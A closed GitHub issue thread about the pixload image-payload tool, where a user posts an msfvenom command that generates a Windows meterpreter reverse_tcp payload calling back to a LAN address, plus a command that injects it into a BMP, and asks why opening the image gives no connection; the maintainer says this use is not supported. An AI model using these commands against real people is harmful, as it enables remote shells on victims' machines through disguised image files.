Closed jepunband closed 4 years ago
@jepunband Yep, you're trying to inject binary (PE) data into an image and exploit it via the opening. Pixload has many use cases, but unfortunately, this way isn't implemented ;)
See https://github.com/chinarulezzz/pixload#about links for more information.
Kind Regards, A.
Ok thanks for the info.
hi steps i did was ...
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -f raw > payload.php
./bmp.pl [-payload 'payload.php'] -output payload.bmp [>] Injecting payload into /home/modus/Desktop/payload.bmp [✔] Payload was injected successfully
In metasploit everything is configured the same but no reverse connection when the picture is opened.
is there something i'm doing wrong?